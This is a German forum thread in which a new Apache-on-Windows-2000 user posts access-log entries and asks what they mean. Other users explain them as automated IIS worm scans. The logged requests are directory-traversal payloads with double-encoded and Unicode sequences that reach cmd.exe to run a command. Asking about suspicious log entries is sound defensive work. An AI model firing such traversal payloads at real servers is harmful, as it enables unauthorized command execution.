Apache Webserver Logdatei

#1
Hi Leute,
Ich hab seit ein paar Tagen bei mir einen Webserver (Apache) unter Win200 laufen, und hab mir mal die Logdatei angeschaut. Bis auf einige Ausnahmen stehen auch ganz normale Sachen drinnen, wie z.B.
192.168.0.2 - - [18/Dec/2001:00:56:44 +0100] "GET /BIO/Ernaehrung/spurel.html HTTP/1.1" 200 1476

Aber dazwischen findet sich immer wieder:
62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307

Mich würde interressieren, was derjenige mit solchen Anfragen bezweckt? Gibt´s da irgendein Sicherheitsloch von dem ich wisen sollte?

thx im Vorraus
Noob

P.S.: Win2000 hat das neueste Service Pack, Apache Version ist 1.3.22
 

Indi

Member of Honour
#2
Nur mal so eine Idee:

62.107.27.236 ist nicht zufällig deine IP oder?
 
#4
Ach, da solltest du dir echt keine sorgen machen. Diese attacken füllen knapp 80% meines LogFiles. Es muss sich um einen Virus handeln, der sowas versucht, denn es sind teilweise 4 Leute in der gleichen Sekunde dabei! Also: No Panic - if no M$! :)) Nix neues also *fg*
 
#5
big tthhxx für die schnelle Hilfe.
War gut, dass ich diesmal nicht M$ Progs eingesetzt habe :] .
Gibt´s eine Liste, auf der ich nachsehen kann, für welche Exploits mein System noch anfällig ist?

mfg
Noob
 
Oben